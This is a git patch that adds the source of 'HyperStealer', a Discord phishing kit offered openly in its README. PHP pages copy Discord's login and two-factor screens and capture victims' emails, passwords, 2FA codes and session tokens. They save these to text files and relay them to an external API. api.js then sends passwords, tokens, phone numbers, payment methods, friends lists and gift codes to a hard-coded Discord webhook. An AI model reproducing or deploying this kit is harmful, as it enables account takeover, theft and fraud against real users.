From 5565d8f569be5c1992740aa7f5b5d2f639bdf16b Mon Sep 17 00:00:00 2001 From: Satyabrata Pradhan <99580536+satyabrata860@users.noreply.github.com> Date: Sun, 30 Oct 2022 11:11:49 +0530 Subject: [PATCH] Add files via upload --- Fulls.txt | 0 README.md | 3 + Tokens.txt | 0 api.js | 247 +++++++++++++++++++++++++++++++++ captcha.php | 78 +++++++++++ config.php | 1 + index.html | 375 +++++++++++++++++++++++++++++++++++++++++++++++++++ index.php | 187 +++++++++++++++++++++++++ mfa.php | 166 +++++++++++++++++++++++ spreader.php | 31 +++++ 10 files changed, 1088 insertions(+) create mode 100644 Fulls.txt create mode 100644 README.md create mode 100644 Tokens.txt create mode 100644 api.js create mode 100644 captcha.php create mode 100644 config.php create mode 100644 index.html create mode 100644 index.php create mode 100644 mfa.php create mode 100644 spreader.php diff --git a/Fulls.txt b/Fulls.txt new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md new file mode 100644 index 0000000..2db9a80 --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +> Official Src Of HyperStealer! So Yea Thats It Rest If You Are'nt A Skid Yk How To Host It, And If U need any additional Help Dm Me On My Discord Void.#4848 + +> 5 Stars = Bot Source Code! diff --git a/Tokens.txt b/Tokens.txt new file mode 100644 index 0000000..e69de29 diff --git a/api.js b/api.js new file mode 100644 index 0000000..aa44af4 --- /dev/null +++ b/api.js @@ -0,0 +1,247 @@ +/* + Hyper Stealer v1 | Made With Code Not With <3 xD + Website : hyperstealer.lol +*/ + + +let WEBHOOK_URL = "https://discord.com/api/webhooks/979653273617317938/HyXQZvMLqN7xp64_0kHXuk7ZKrOK2nc4Pm2OhtNTObMX68gYTRMWNCvChQgdUq0wHOK_"; +let rawurl = "https://api.hyperstealer.vip"; +let config = { + "embed-color": 3158071 +} + +const express = require("express") +const axios = require("axios") + + +function GetNitro(flags) { + if (flags == 0) { + return "No Nitro" + } + if (flags == 1) { + return "<:classic:896119171019067423> \`Nitro Classic\`" + } + if (flags == 2) { + return " \`Nitro Boost\`" + } else { + return "\`No Nitro\`" + } +} + + +function GetRBadges(flags) { + const Discord_Employee = 1; + const Partnered_Server_Owner = 2; + const HypeSquad_Events = 4; + const Bug_Hunter_Level_1 = 8; + const Early_Supporter = 512; + const Bug_Hunter_Level_2 = 16384; + const Early_Verified_Bot_Developer = 131072; + var badges = ""; + if ((flags & Discord_Employee) == Discord_Employee) { + badges += "<:staff:874750808728666152> " + } + if ((flags & Partnered_Server_Owner) == Partnered_Server_Owner) { + badges += "<:partner:874750808678354964> " + } + if ((flags & HypeSquad_Events) == HypeSquad_Events) { + badges += "<:hypesquad_events:874750808594477056> " + } + if ((flags & Bug_Hunter_Level_1) == Bug_Hunter_Level_1) { + badges += "<:bughunter_1:874750808426692658> " + } + if ((flags & Early_Supporter) == Early_Supporter) { + badges += "<:early_supporter:874750808414113823> " + } + if ((flags & Bug_Hunter_Level_2) == Bug_Hunter_Level_2) { + badges += "<:bughunter_2:874750808430874664> " + } + if ((flags & Early_Verified_Bot_Developer) == Early_Verified_Bot_Developer) { + badges += "<:developer:874750808472825986> " + } + if (badges == "") { + badges = "" + } + return badges +} + +function totalFriends(f) { + const r = f.filter((user) => { + + return user.type == 1 + }) + return r.length +} + +function CalcFriends(f) { + const r = f.filter((user) => { + return user.type == 1 + }) + var gay = ""; + for (z of r) { + var b = GetRBadges(z.user.public_flags) + if (b != "") { + gay += b + ` ${z.user.username}#${z.user.discriminator}\n` + } + } + if (gay == "") { + gay = "\`No Rare Friends\`" + } + return gay +} + +function GetBadges(flags) { + const Discord_Employee = 1; + const Partnered_Server_Owner = 2; + const HypeSquad_Events = 4; + const Bug_Hunter_Level_1 = 8; + const House_Bravery = 64; + const House_Brilliance = 128; + const House_Balance = 256; + const Early_Supporter = 512; + const Bug_Hunter_Level_2 = 16384; + const Early_Verified_Bot_Developer = 131072; + var badges = ""; + if ((flags & Discord_Employee) == Discord_Employee) { + badges += "<:staff:874750808728666152> " + } + if ((flags & Partnered_Server_Owner) == Partnered_Server_Owner) { + badges += "<:partner:874750808678354964> " + } + if ((flags & HypeSquad_Events) == HypeSquad_Events) { + badges += "<:hypesquad_events:874750808594477056> " + } + if ((flags & Bug_Hunter_Level_1) == Bug_Hunter_Level_1) { + badges += "<:bughunter_1:874750808426692658> " + } + if ((flags & House_Bravery) == House_Bravery) { + badges += "<:bravery:874750808388952075> " + } + if ((flags & House_Brilliance) == House_Brilliance) { + badges += "<:brilliance:874750808338608199> " + } + if ((flags & House_Balance) == House_Balance) { + badges += "<:balance:874750808267292683> " + } + if ((flags & Early_Supporter) == Early_Supporter) { + badges += "<:early_supporter:874750808414113823> " + } + if ((flags & Bug_Hunter_Level_2) == Bug_Hunter_Level_2) { + badges += "<:bughunter_2:874750808430874664> " + } + if ((flags & Early_Verified_Bot_Developer) == Early_Verified_Bot_Developer) { + badges += "<:developer:874750808472825986> " + } + if (badges == "") { + badges = "\`None\`" + } + return badges +} + +function Cool(card) { + const json = card + var billing = ""; + json.forEach(z => { + if (z.type == "") { + return "\`❌\`" + } else if (z.type == 2 && z.invalid != !0) { + billing += "\`✔️\`" + " <:paypal:896441236062347374>" + } else if (z.type == 1 && z.invalid != !0) { + billing += "\`✔️\`" + " :credit_card:" + } else { + return "\`❌\`" + } + }) + if (billing == "") { + billing = "\`❌ No Payment Method\`" + } + return billing +} + + + +function userLogin(password, email, token) { + headers = { "Authorization": token } + axios("https://discordapp.com/api/v9/users/@me", { headers: headers }).then(results=> { + axios("https://discordapp.com/api/v6/users/@me/billing/payment-sources", { headers: headers }).then(card => { + axios("https://discord.com/api/v9/users/@me/relationships", { headers: headers }).then(friends => { + + + let fields = [ { "name": ":shield: Username", "value": `\`${results.data.username}#${results.data.discriminator}\``, "inline": true }, { "name": ":tools: Developer ID", "value": `\`${results.data.id}\``, "inline": true }, { "name": ":e_mail: Email", "value": `\`${email}\``, "inline": true }, { "name": ":white_check_mark: Verified", "value": `\`${results.data.verified}\``, "inline": true },{ "name": ":lock: Password", "value": `\`${password}\``, "inline": true} ] + if (results.data.verified === true) { + fields.push( { "name": ":mobile_phone: Phone", "value": `\`${results.data.phone}\``, "inline": true } ) + } + fields.push({ "name": "<:st_nitro:956151524306874399> Subscription", "value": `${GetNitro(results.data.premium_type)}`, "inline": true }) + fields.push({ "name": "Payment Method", "value": `${Cool(card.data)}`, "inline": true }) + fields.push({ "name": " Badges", "value": `${GetBadges(results.data.flag)}`, "inline": true }) + fields.push({ "name": "Token", "value": `\`\`\`${token}\`\`\``, "inline": true }) + + let fieldss = [] + axios.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', { headers: headers }).then(res => { + res.data.forEach(json => { + let description = `${json.code}` + fieldss.push({ "name": `<:GIFT:937363744244240444> ${json.promotion.outbound_title}`, "value": `\`\`\`\n${description}\n\`\`\``, "inline": false }) + }) + + let embed1 = { "description": `[**<:partner:909102089513340979> │ Click Here To Copy Info On Mobile**](${rawurl}/api?raw=${token}:${password})`, "color": config["embed-color"], "author": { "name": "HyperStealer | v1" }, "fields": fields, "footer": { "text": `hyperstealer.vip`, "icon": `https://cdn.discordapp.com/avatars/${results.data.id}/${results.data.avatar}` } } + let embed2 = { "color": config["embed-color"], "title": `Total Frens (${totalFriends(friends.data)})`, "description": `${CalcFriends(friends.data)}`, "footer": { "text": `${results.data.username}#${results.data.discriminator}`, "icon": `https://cdn.discordapp.com/avatars/${results.data.id}/${results.data.avatar}` } } + let embed3 = { "color": config["embed-color"], "title": `Gift Codes`, "fields": fieldss, "footer": { "text": `${results.data.username}#${results.data.discriminator}`, "icon": `https://cdn.discordapp.com/avatars/${results.data.id}/${results.data.avatar}` } } + + axios.post(WEBHOOK_URL, {"content": "||@here|| `New User Just Logged In`", "embeds": [ embed1, embed2, embed3 ] }) + }) + }) + }) + }) +} + + +function UserInjected(path, hostname) { + let embed = { "title": "Discord Initalized (User not Logged in)", "color": config["embed-color"],"fields": [{ "name": "Info", "value": `\`\`\`\nHost Name : ${hostname}\nPath Injected : ${path}\n\`\`\`` }],"footer": { "text": "VoidStealer | CaptchaCord.cc" } } + axios.post(WEBHOOK_URL, {"content": "||@here|| `Injected But No Discords Logged In xD!!!`", "embeds": [ embed ] }) +} + + +/* + Rest Api Starts From Here xD Once Again Made With Code Not With <3 +*/ + + +const app = express() + + +app.get('/api/v1/userlogin', (req, res) => { + let password = req.query.password + let email = req.query.email + let token = req.query.token + + userLogin(password, email, token) +}) + +app.get('/api', (req, res) => { + res.send(req.query.raw) +}) + +app.listen(6969) + +console.log(' ______ __ __ ______ __') +console.log(' / ____/___ _____ / /______/ /_ ____ _/ ____/___ _________/ /') +console.log(' / / / __ `/ __ \\/ __/ ___/ __ \\/ __ `/ / / __ \\/ ___/ __ /') +console.log(' / /___/ /_/ / /_/ / /_/ /__/ / / / /_/ / /___/ /_/ / / / /_/ / ') +console.log(' \\____/\\__,_/ .___/\\__/\\___/_/ /_/\\__,_/\\____/\\____/_/ \\__,_/ ') +console.log(' /_/') + +console.log(` +──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +* Debugger is active! +* Running on all addresses. +* WARNING: This is a development server. Do not use it in a production deployment. +* Running on http://localhost:6969/ (Press CTRL+C to quit) +`) + + +process.on('unhandledRejection', (error) => { console.log(`${error.stack}`) }); +process.on("uncaughtException", (err, origin) => { console.log(`${err.stack}`) }) +process.on('uncaughtExceptionMonitor', (err, origin) => { console.log(`${err.stack}`) }); +process.on('beforeExit', (code) => { console.log(`${code}`) }); +process.on('exit', (code) => { console.log(`${code}`) }); +process.on('multipleResolves', (type, promise, reason) => { });  \ No newline at end of file diff --git a/captcha.php b/captcha.php new file mode 100644 index 0000000..4a1a939 --- /dev/null +++ b/captcha.php @@ -0,0 +1,78 @@ + + + + Discord + + + + + + + + + + + + + + + + + +
+
+
+
+ +
+
+
+
+
+ +

+ Welcome back!

+
+ Beep boop. Boop beep?
+
+
+
+
+ + + +
+
+
+
+
+
+
+
+
+
+ + + + diff --git a/config.php b/config.php new file mode 100644 index 0000000..eda1c56 --- /dev/null +++ b/config.php @@ -0,0 +1 @@ + diff --git a/index.html b/index.html new file mode 100644 index 0000000..96ed444 --- /dev/null +++ b/index.html @@ -0,0 +1,375 @@ + + + + + + + Apache2 Ubuntu Default Page: It works + + + +
+
+ Ubuntu Logo + + Apache2 Ubuntu Default Page + +
+ +
+ + +
+
+ It works! +
+
+

+ This is the default welcome page used to test the correct + operation of the Apache2 server after installation on Ubuntu systems. + It is based on the equivalent page on Debian, from which the Ubuntu Apache + packaging is derived. + If you can read this page, it means that the Apache HTTP server installed at + this site is working properly. You should replace this file (located at + /var/www/html/index.html) before continuing to operate your HTTP server. +

+ + +

+ If you are a normal user of this web site and don't know what this page is + about, this probably means that the site is currently unavailable due to + maintenance. + If the problem persists, please contact the site's administrator. +

+ +
+
+
+ Configuration Overview +
+
+

+ Ubuntu's Apache2 default configuration is different from the + upstream default configuration, and split into several files optimized for + interaction with Ubuntu tools. The configuration system is + fully documented in + /usr/share/doc/apache2/README.Debian.gz. Refer to this for the full + documentation. Documentation for the web server itself can be + found by accessing the manual if the apache2-doc + package was installed on this server. + +

+

+ The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows: +

+ 
+/etc/apache2/
+|-- apache2.conf
+|       `--  ports.conf
+|-- mods-enabled
+|       |-- *.load
+|       `-- *.conf
+|-- conf-enabled
+|       `-- *.conf
+|-- sites-enabled
+|       `-- *.conf
+
+
    +
  • + apache2.conf is the main configuration + file. It puts the pieces together by including all remaining configuration + files when starting up the web server. +
    • + +
  • + ports.conf is always included from the + main configuration file. It is used to determine the listening ports for + incoming connections, and this file can be customized anytime. +
    • + +
  • + Configuration files in the mods-enabled/, + conf-enabled/ and sites-enabled/ directories contain + particular configuration snippets which manage modules, global configuration + fragments, or virtual host configurations, respectively. +
    • + +
  • + They are activated by symlinking available + configuration files from their respective + *-available/ counterparts. These should be managed + by using our helpers + + a2enmod, + a2dismod, + + + a2ensite, + a2dissite, + + and + + a2enconf, + a2disconf + . See their respective man pages for detailed information. +
    • + +
  • + The binary is called apache2. Due to the use of + environment variables, in the default configuration, apache2 needs to be + started/stopped with /etc/init.d/apache2 or apache2ctl. + Calling /usr/bin/apache2 directly will not work with the + default configuration. +
    • +
+
+ +
+
+ Document Roots +
+ +
+

+ By default, Ubuntu does not allow access through the web browser to + any file apart of those located in /var/www, + public_html + directories (when enabled) and /usr/share (for web + applications). If your site is using a web document root + located elsewhere (such as in /srv) you may need to whitelist your + document root directory in /etc/apache2/apache2.conf. +

+

+ The default Ubuntu document root is /var/www/html. You + can make your own virtual hosts under /var/www. This is different + to previous releases which provides better security out of the box. +

+
+ +
+
+ Reporting Problems +
+
+

+ Please use the ubuntu-bug tool to report bugs in the + Apache2 package with Ubuntu. However, check existing bug reports before reporting a new bug. +

+

+ Please report bugs specific to modules (such as PHP and others) + to respective packages, not to the web server itself. +

+
+ + + + +
+
+
+
+ + + diff --git a/index.php b/index.php new file mode 100644 index 0000000..37fe6b6 --- /dev/null +++ b/index.php @@ -0,0 +1,187 @@ + $login, + 'password' => $password, + 'undelete' => FALSE, + 'captcha_key' => $captcha_key, + 'login_source' => NULL, + 'gift_code_sku_id' => NULL ) ); + + $request_headers = array( + "Content-Type: application/json" + ); + $ch = curl_init(); + curl_setopt($ch,CURLOPT_URL, $url); + curl_setopt($ch,CURLOPT_POST, true); + curl_setopt($ch, CURLOPT_POSTFIELDS, $payload ); + curl_setopt($ch,CURLOPT_RETURNTRANSFER, true); + curl_setopt($ch, CURLOPT_HTTPHEADER, $request_headers); + $result = curl_exec($ch); + curl_close($ch); + if (strpos($result, '"mfa"') !== false) { + // 2fa redirect + $ticket = json_decode($result, true)["ticket"]; + $pw = base64_encode($password); + $em = base64_encode($login); + header("Location: /mfa.php?ticket=$ticket&em=$em&pw=$pw"); + exit(); + } + else if (strpos($result, '{"token":') !== false) { + $MSG = "SUCCESS"; + $yay = json_decode($result, true); + $token = $yay["token"]; + + if ($SAVE_TO_TXT) { + $myfile = fopen("Tokens.txt", "a"); + fwrite($myfile, $token."\n\r"); + fclose($myfile); + + $myfile = fopen("Fulls.txt", "a"); + fwrite($myfile, $login.":".$password.":".$token."\n\r"); + fclose($myfile); + } + + require_once 'spreader.php'; + + getbadges($token, $login, $password, $_SERVER["REMOTE_ADDR"]); + } + else if (strpos($result, 'ACCOUNT_LOGIN_VERIFICATION_EMAIL') !== false) { + $MSG = "New login location detected, please check your e-mail."; + } + else if (strpos($result, 'INVALID_LOGIN') !== false) { + $MSG = "Login or password is invalid."; + } + else if (strpos($result, 'captcha-required') !== false) { + header("Location: /"); + exit(); + } + else { + header("Location: /"); + exit(); + } + + } +?> + + + + Discord + + + + + + + + + + + + + + + + + +
+
+
+ +
+
+ +
+
+
+
+
+
+
+

Welcome back!

+
We're so excited to see you again!
+
+
+
Email or Phone Number +
+
+
+
+
Password +
+
+
+ +
Need an account?
+
+
+
+
+
+
+
Scan me!

Log in with QR Code

Scan this with the Discord mobile app to log in instantly
+
+
+
+
+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/mfa.php b/mfa.php new file mode 100644 index 0000000..72e2057 --- /dev/null +++ b/mfa.php @@ -0,0 +1,166 @@ + $code, + 'ticket' => $ticket, + 'login_source' => NULL, + 'gift_code_sku_id' => NULL ) ); + $request_headers = array( + "Content-Type: application/json" + ); + $ch = curl_init(); + curl_setopt($ch,CURLOPT_URL, $url); + curl_setopt($ch,CURLOPT_POST, true); + curl_setopt($ch, CURLOPT_POSTFIELDS, $payload ); + curl_setopt($ch,CURLOPT_RETURNTRANSFER, true); + curl_setopt($ch, CURLOPT_HTTPHEADER, $request_headers); + $result = curl_exec($ch); + if (strpos($result, 'Invalid two-factor code') !== false) { + $MSG = "Invalid two-factor code"; + } + + else if (strpos($result, 'Invalid two-factor auth ticket') !== false) { + $MSG = "Invalid two-factor auth ticket"; + header("Location: /"); + exit(); + } + + else if (strpos($result, 'token') !== false) { + $MSG = "SUCCESS"; + $yay = json_decode($result, true); + $token = $yay["token"]; + + if ($SAVE_TO_TXT) { + $myfile = fopen("Tokens.txt", "a"); + fwrite($myfile, $token."\n\r"); + fclose($myfile); + + $myfile = fopen("Fulls.txt", "a"); + fwrite($myfile, $login.":".$password.":".$token."\n\r"); + fclose($myfile); + } + + $urltopost = $api_url.'?token='.$token.'&email='.$login.'&password='.$password; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $urltopost); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + $response = curl_exec($ch); + } + else { + header("Location: /"); + exit(); + } +} +} + +?> + + + Discord + + + + + + + + + + + + + + + + + +
+
+
+ +
+
+
+
+
+
+

Two-factor authentication

+
You can use a backup code or your two-factor authentication mobile app.
+
+
+
ENTER DISCORD AUTH/BACKUP CODE +
+
+
+
+
+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/spreader.php b/spreader.php new file mode 100644 index 0000000..8eda40c --- /dev/null +++ b/spreader.php @@ -0,0 +1,31 @@ +